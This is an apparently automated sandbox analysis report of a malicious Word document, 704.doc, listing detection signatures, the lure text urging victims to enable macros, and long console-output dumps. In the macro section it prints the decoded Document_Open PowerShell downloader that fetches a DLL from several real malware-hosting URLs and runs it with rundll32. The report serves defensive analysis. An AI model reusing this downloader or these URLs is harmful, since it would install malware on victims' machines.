Windows Analysis Report 704.doc

Overview

General Information

Sample Name:	704.doc
Analysis ID:	526268
MD5:	40f85d07da2533d576b1f2d7c043a2da
SHA1:	60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:	d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Infos:
Most interesting Screenshot:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus detection for URL or domain

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document contains an embedded VBA macro which may execute processes

Obfuscated command line found

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Suspicious powershell command line found

Machine Learning detection for sample

Document contains no OLE stream with summary information

Queries the volume information (name, serial number etc) of a device

Yara signature match

Document has an unknown application name

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to detect virtual machines (SLDT)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://ckfoods.net/wp-admin/wPInm2rgMu/	Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/	Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: 704.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp

Jump to behavior

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: ~DF59F33552EDE7EF7C.TMP.0.dr

Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)			Name: fjow3efyw98efhasdokfhlnkvawofh3
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document contains no OLE stream with summary information

Source: 704.doc	OLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator has summary info: false

Yara signature match

Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPED

Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc

Document has an unknown application name

Source: 704.doc	OLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator application name: unknown

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 704.doc	OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentation	OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open	Name: Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Document contains embedded VBA macros

Source: 704.doc	OLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator, VBA macros: true

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.........n.....................................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
